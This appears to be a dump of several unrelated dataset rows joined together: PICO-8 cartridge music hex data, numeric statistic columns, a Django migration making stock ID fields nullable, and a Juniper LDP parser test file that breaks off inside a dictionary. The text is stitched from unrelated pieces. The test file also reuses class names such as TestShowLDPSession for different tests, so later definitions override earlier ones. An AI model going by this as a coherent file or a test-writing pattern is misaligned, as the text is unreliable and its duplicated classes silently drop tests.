0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
__sfx__
0110000000472004620c3400c34318470004311842500415003700c30500375183750c3000c3751f4730c375053720536211540114330c37524555247120c3730a470163521d07522375164120a211220252e315
01100000183732440518433394033c65539403185432b543184733940318433394033c655306053940339403184733940318423394033c655394031845321433184733940318473394033c655394033940339403
01100000247552775729755277552475527755297512775524755277552b755277552475527757297552775720755247572775524757207552475227755247522275526757297552675722752267522975526751
01100000001750c055003550c055001750c055003550c05500175180650c06518065001750c065003650c065051751106505365110650c17518075003650c0650a145160750a34516075111451d075113451d075
011000001b5771f55722537265171b5361f52622515265121b7771f76722757267471b7461f7362271522712185771b5571d53722517187361b7261d735227122454527537295252e5171d73514745227452e745
01100000275422754227542275422e5412e5452b7412b5422b5452b54224544245422754229541295422954224742277422e7422b7422b5422b5472954227542295422b742307422e5422e7472b547305462e742
0110000030555307652e5752b755295622e7722b752277622707227561297522b072295472774224042275421b4421b5451b5421b4421d542295471d442295422444624546245472444727546275462944729547
0110000000200002000020000200002000020000200002000020000200002000020000200002000020000200110171d117110171d227131211f227130371f2370f0411b1470f2471b35716051221571626722367
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002e775000002e1752e075000002e1752e77500000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
__music__
00 00044208
00 00044108
00 00010304
00 00010304
01 00010203
00 00010203
00 00010305
00 00010306
00 00010305
00 00010306
00 00010245
02 00010243
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
| 113.003012
| 256
| 0.982328
| 451
| 37,517
| 81.651885
| 0.210643
| 0.785553
| 1.157475
| 1.529396
| 0.881412
| 0.880272
| 0.880272
| 0.880272
| 0.880272
| 0.880272
| 0
| 0.985703
| 0.01562
| 37,517
| 331
| 257
| 113.344411
| 0.011427
| 0.001413
| 0
| 0.825
| 0
| 0
| 0.000587
| 0.000587
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0.00625
| 0.003125
| null | null | 0.00625
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 16
|
487f6ca51b72cfba149dbc11c7294a7ca6e60ddb
| 1,579
|
py
|
Python
|
stock/migrations/0004_auto_20210524_0215.py
|
ericpesto/Archeon-Django-REST-API
|
e02b871b95c5247d83580acfe25f6ec299fdb9b1
|
[
"MIT"
] | 1
|
2021-06-07T17:31:23.000Z
|
2021-06-07T17:31:23.000Z
|
stock/migrations/0004_auto_20210524_0215.py
|
ericpesto/Archeon-Django-REST-API
|
e02b871b95c5247d83580acfe25f6ec299fdb9b1
|
[
"MIT"
] | null | null | null |
stock/migrations/0004_auto_20210524_0215.py
|
ericpesto/Archeon-Django-REST-API
|
e02b871b95c5247d83580acfe25f6ec299fdb9b1
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.3 on 2021-05-24 02:15
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('stock', '0003_auto_20210522_1811'),
]
operations = [
migrations.AlterField(
model_name='stock',
name='artist_id',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='stock',
name='buyer_id',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='stock',
name='category_id',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='stock',
name='location_id',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='stock',
name='partner_id',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='stock',
name='source_id',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='stock',
name='sub_category_1_id',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='stock',
name='sub_category_2_id',
field=models.IntegerField(blank=True, null=True),
),
]
| 29.240741
| 61
| 0.554148
| 153
| 1,579
| 5.568627
| 0.27451
| 0.187793
| 0.234742
| 0.2723
| 0.776995
| 0.776995
| 0.732394
| 0.732394
| 0.683099
| 0.683099
| 0
| 0.031103
| 0.328056
| 1,579
| 53
| 62
| 29.792453
| 0.771913
| 0.028499
| 0
| 0.680851
| 1
| 0
| 0.104439
| 0.015013
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.021277
| 0
| 0.085106
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6fa1ec753f3d3bc7506e0710280bd455555fdad1
| 62,115
|
py
|
Python
|
src/genie/libs/parser/junos/tests/test_show_ldp.py
|
Jmahaja1/genieparser
|
b5eff62db24bf70497eba3af5587d77cdbf25784
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/junos/tests/test_show_ldp.py
|
Jmahaja1/genieparser
|
b5eff62db24bf70497eba3af5587d77cdbf25784
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/junos/tests/test_show_ldp.py
|
Jmahaja1/genieparser
|
b5eff62db24bf70497eba3af5587d77cdbf25784
|
[
"Apache-2.0"
] | null | null | null |
# Python
import unittest
from unittest.mock import Mock
# ATS
from pyats.topology import Device
# Metaparser
from genie.metaparser.util.exceptions import SchemaEmptyParserError
from genie.libs.parser.junos.show_ldp import (ShowLDPSession,
ShowLdpNeighbor,
ShowLdpSessionIpaddressDetail,
ShowLdpDatabaseSessionIpaddress,
ShowLDPInterface,ShowLDPInterfaceDetail,
ShowLDPOverview)
# =================================
# Unit test for 'show ldp session'
# =================================
class TestShowLDPSession(unittest.TestCase):
'''unit test for "show ldp session'''
device = Device(name='aDevice')
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output = {
'ldp-session-information': {
'ldp-session': [{
'ldp-neighbor-address': '10.34.2.250',
'ldp-session-state': 'Operational',
'ldp-connection-state': 'Open',
'ldp-remaining-time': '26',
'ldp-session-adv-mode': 'DU'
}]
}
}
golden_output = {
'execute.return_value':
'''
Address State Connection Hold time Adv. Mode
10.34.2.250 Operational Open 26 DU
'''
}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowLDPSession(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowLDPSession(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output)
# ===============================================
# Unit test for 'show ldp interface {interface}'
# ===============================================
class TestShowLDPInterface(unittest.TestCase):
'''unit test for "show ldp interface {interface}'''
device = Device(name='aDevice')
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output = {
"ldp-interface-information": {
"ldp-interface": {
"interface-name": "ge-0/0/0.0",
"ldp-interface-local-address": "10.169.14.157",
"ldp-label-space-id": "10.169.14.240:0",
"ldp-neighbor-count": "1",
"ldp-next-hello": "3"
}
}
}
golden_output = {
'execute.return_value':
'''
show ldp interface ge-0/0/0.0
Interface Address Label space ID Nbr Next
count hello
ge-0/0/0.0 10.169.14.157 10.169.14.240:0 1 3
'''
}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowLDPInterface(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse(interface='ge-0/0/0.0')
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowLDPInterface(device=self.device)
parsed_output = obj.parse(interface='ge-0/0/0.0')
self.assertEqual(parsed_output, self.golden_parsed_output)
# =====================================================
# Unit test for 'show ldp interface {interface} detail'
# =====================================================
class TestShowLDPInterfaceDetail(unittest.TestCase):
'''unit test for "show ldp interface {interface} detail'''
device = Device(name='aDevice')
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output = {
"ldp-interface-information": {
"ldp-interface": {
"interface-name": "ge-0/0/0.0",
"ldp-interface-local-address": "10.169.14.157",
"ldp-label-space-id": "10.169.14.240:0",
"ldp-neighbor-count": "1",
"ldp-next-hello": "1",
"ldp-transport-address": "10.169.14.240",
"ldp-hello-interval": "5",
"ldp-holdtime": "15",
}
}
}
golden_output = {
'execute.return_value':
'''
show ldp interface ge-0/0/0.0 detail
Interface Address Label space ID Nbr Next
count hello
ge-0/0/0.0 10.169.14.157 10.169.14.240:0 1 1
Hello interval: 5, Hold time: 15, Transport address: 10.169.14.240
'''
}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowLDPInterfaceDetail(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse(interface='ge-0/0/0.0')
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowLDPInterfaceDetail(device=self.device)
parsed_output = obj.parse(interface='ge-0/0/0.0')
self.assertEqual(parsed_output, self.golden_parsed_output)
# =================================
# Unit test for 'show ldp neighbor'
# =================================
class TestShowLDPSession(unittest.TestCase):
'''unit test for "show ldp session'''
device = Device(name='aDevice')
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output = {
'ldp-neighbor-information':
{'ldp-neighbor': [
{'interface-name': 'ge-0/0/0.0',
'ldp-label-space-id': '10.34.2.250:0',
'ldp-neighbor-address': '10.169.14.158',
'ldp-remaining-time': '14'
}
]
}
}
golden_output = {
'execute.return_value':
'''
show ldp neighbor
Address Interface Label space ID Hold time
10.169.14.158 ge-0/0/0.0 10.34.2.250:0 14
'''
}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowLdpNeighbor(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowLdpNeighbor(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output)
# =================================
# Unit test for 'show ldp database session ipaddress'
# =================================
class TestShowLDPSession(unittest.TestCase):
'''unit test for "show ldp database session ipaddress'''
device = Device(name='aDevice')
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output = {
"ldp-database-information": {
"ldp-database": [
{
"ldp-binding": [
{
"ldp-label": "3",
"ldp-prefix": "10.34.2.250/32"
},
{
"ldp-label": "16",
"ldp-prefix": "10.169.14.240/32"
}
],
"ldp-database-type": "Input label database",
"ldp-label-received": "2",
"ldp-session-id": "10.169.14.240:0--10.34.2.250:0"
},
{
"ldp-binding": [
{
"ldp-label": "16",
"ldp-prefix": "10.34.2.250/32"
},
{
"ldp-label": "3",
"ldp-prefix": "10.169.14.240/32"
}
],
"ldp-database-type": "Output label database",
"ldp-label-advertised": "2",
"ldp-session-id": "10.169.14.240:0--10.34.2.250:0"
}
]
}
}
golden_output = {
'execute.return_value':
'''
show ldp database 10.34.2.250
Input label database, 10.169.14.240:0--10.34.2.250:0
Labels received: 2
Label Prefix
3 10.34.2.250/32
16 10.169.14.240/32
Output label database, 10.169.14.240:0--10.34.2.250:0
Labels advertised: 2
Label Prefix
16 10.34.2.250/32
3 10.169.14.240/32
'''
}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowLdpDatabaseSessionIpaddress(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowLdpDatabaseSessionIpaddress(device=self.device)
parsed_output = obj.parse(ipaddress='10.34.2.250')
self.assertEqual(parsed_output, self.golden_parsed_output)
# =================================
# Unit test for 'show ldp neighbor'
# =================================
class TestShowLdpNeighbor(unittest.TestCase):
'''unit test for "show ldp neighbor '''
device = Device(name='aDevice')
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output = {
'ldp-neighbor-information':
{'ldp-neighbor': [
{'interface-name': 'ge-0/0/0.0',
'ldp-label-space-id': '10.34.2.250:0',
'ldp-neighbor-address': '10.169.14.158',
'ldp-remaining-time': '14'
}
]
}
}
golden_output = {
'execute.return_value':
'''
show ldp neighbor
Address Interface Label space ID Hold time
10.169.14.158 ge-0/0/0.0 10.34.2.250:0 14
'''
}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowLdpNeighbor(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowLdpNeighbor(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output)
# =================================
# Unit test for 'show ldp database session ipaddress'
# =================================
class TestShowLdpDatabaseSessionIpaddress(unittest.TestCase):
'''unit test for "show ldp database session ipaddress'''
device = Device(name='aDevice')
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output = {
"ldp-database-information": {
"ldp-database": [
{
"ldp-binding": [
{
"ldp-label": "3",
"ldp-prefix": "10.34.2.250/32"
},
{
"ldp-label": "16",
"ldp-prefix": "10.169.14.240/32"
}
],
"ldp-database-type": "Input label database",
"ldp-label-received": "2",
"ldp-session-id": "10.169.14.240:0--10.34.2.250:0"
},
{
"ldp-binding": [
{
"ldp-label": "16",
"ldp-prefix": "10.34.2.250/32"
},
{
"ldp-label": "3",
"ldp-prefix": "10.169.14.240/32"
}
],
"ldp-database-type": "Output label database",
"ldp-label-advertised": "2",
"ldp-session-id": "10.169.14.240:0--10.34.2.250:0"
}
]
}
}
golden_output = {
'execute.return_value':
'''
show ldp database 10.34.2.250
Input label database, 10.169.14.240:0--10.34.2.250:0
Labels received: 2
Label Prefix
3 10.34.2.250/32
16 10.169.14.240/32
Output label database, 10.169.14.240:0--10.34.2.250:0
Labels advertised: 2
Label Prefix
16 10.34.2.250/32
3 10.169.14.240/32
'''
}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowLdpDatabaseSessionIpaddress(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowLdpDatabaseSessionIpaddress(device=self.device)
parsed_output = obj.parse(ipaddress='10.34.2.250')
self.assertEqual(parsed_output, self.golden_parsed_output)
# ===============================================
# Unit test for 'show ldp interface {interface}'
# ===============================================
class TestShowLDPInterface(unittest.TestCase):
'''unit test for "show ldp interface {interface}'''
device = Device(name='aDevice')
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output = {
"ldp-interface-information": {
"ldp-interface": {
"interface-name": "ge-0/0/0.0",
"ldp-interface-local-address": "10.1.2.2",
"ldp-label-space-id": "10.204.14.100:0",
"ldp-neighbor-count": "1",
"ldp-next-hello": "3"
}
}
}
golden_output = {
'execute.return_value':
'''
show ldp interface ge-0/0/0.0
Interface Address Label space ID Nbr Next
count hello
ge-0/0/0.0 10.1.2.2 10.204.14.100:0 1 3
'''
}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowLDPInterface(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse(interface='ge-0/0/0.0')
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowLDPInterface(device=self.device)
parsed_output = obj.parse(interface='ge-0/0/0.0')
self.assertEqual(parsed_output, self.golden_parsed_output)
# =====================================================
# Unit test for 'show ldp interface {interface} detail'
# =====================================================
class TestShowLDPInterfaceDetail(unittest.TestCase):
'''unit test for "show ldp interface {interface} detail'''
device = Device(name='aDevice')
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output = {
"ldp-interface-information": {
"ldp-interface": {
"interface-name": "ge-0/0/0.0",
"ldp-interface-local-address": "10.1.2.2",
"ldp-label-space-id": "10.204.14.100:0",
"ldp-neighbor-count": "1",
"ldp-next-hello": "1",
"ldp-transport-address": "10.204.14.100",
"ldp-hello-interval": "5",
"ldp-holdtime": "15",
}
}
}
golden_output = {
'execute.return_value':
'''
show ldp interface ge-0/0/0.0 detail
Interface Address Label space ID Nbr Next
count hello
ge-0/0/0.0 10.1.2.2 10.204.14.100:0 1 1
Hello interval: 5, Hold time: 15, Transport address: 10.204.14.100
'''
}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowLDPInterfaceDetail(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse(interface='ge-0/0/0.0')
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowLDPInterfaceDetail(device=self.device)
parsed_output = obj.parse(interface='ge-0/0/0.0')
self.assertEqual(parsed_output, self.golden_parsed_output)
# =================================
# Unit test for 'show ldp overview'
# =================================
class TestShowLDPOverview(unittest.TestCase):
'''unit test for "show ldp overview'''
device = Device(name='aDevice')
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_output = {'execute.return_value': '''
show ldp overview
Instance: master
Reference count: 2
Router ID: 10.204.14.100
LDP inet: enabled
Transport preference: IPv4
Message id: 4
Configuration sequence: 1
Deaggregate: disabled
Explicit null: disabled
IPv6 tunneling: disabled
Strict targeted hellos: disabled
Loopback if added: no
Route preference: 9
Unicast transit LSP chaining: disabled
P2MP transit LSP chaining: disabled
Transit LSP statistics based on route statistics: disabled
LDP route acknowledgement: enabled
BGP export: enabled
LDP mtu discovery: disabled
LDP SR Mapping Client: disabled
Capabilities enabled: none
Egress FEC capabilities enabled: entropy-label-capability
Downstream unsolicited Sessions:
Operational: 1
Retention: liberal
Control: ordered
Auto targeted sessions:
Auto targeted: disabled
Dynamic tunnel session count: 0
P2MP:
Recursive route: disabled
No rsvp tunneling: disabled
Timers:
Keepalive interval: 10, Keepalive timeout: 30
Link hello interval: 5, Link hello hold time: 15
Targeted hello interval: 15, Targeted hello hold time: 45
Label withdraw delay: 60, Make before break timeout: 30
Make before break switchover delay: 3
Link protection timeout: 120
Graceful restart:
Restart: disabled, Helper: enabled, Restart in process: false
Reconnect time: 60000, Max neighbor reconnect time: 120000
Recovery time: 160000, Max neighbor recovery time: 240000
Traffic Engineering:
Bgp igp: disabled
Both ribs: disabled
Mpls forwarding: disabled
IGP:
Tracking igp metric: disabled
Sync session up delay: 10
Session protection:
Session protection: disabled
Session protection timeout: 0
Interface addresses advertising:
10.1.2.2
LDP Job:
Read job time quantum: 1000, Write job time quantum: 1000
Read job loop quantum: 100, Write job loop quantum: 100
Backup inbound read job time quantum: 1000, Backup outbound read job time quantum: 1000
Backup inbound read job loop quantum: 100, Backup outbound read job loop quantum: 100
Label allocation:
Current number of LDP labels allocated: 1
Total number of LDP labels allocated: 1
Total number of LDP labels freed: 0
Total number of LDP label allocation failure: 0
Current number of labels allocated by all protocols: 0
'''}
golden_parsed_output = {
'ldp-overview-information': {
'ldp-overview': {
'ldp-auto-targeted-session': {
'ldp-auto-targeted-dyn-tun-ses-count': 0,
'ldp-auto-targeted-session-enabled': 'disabled'
},
'ldp-bgp-export': 'enabled',
'ldp-configuration-sequence': 1,
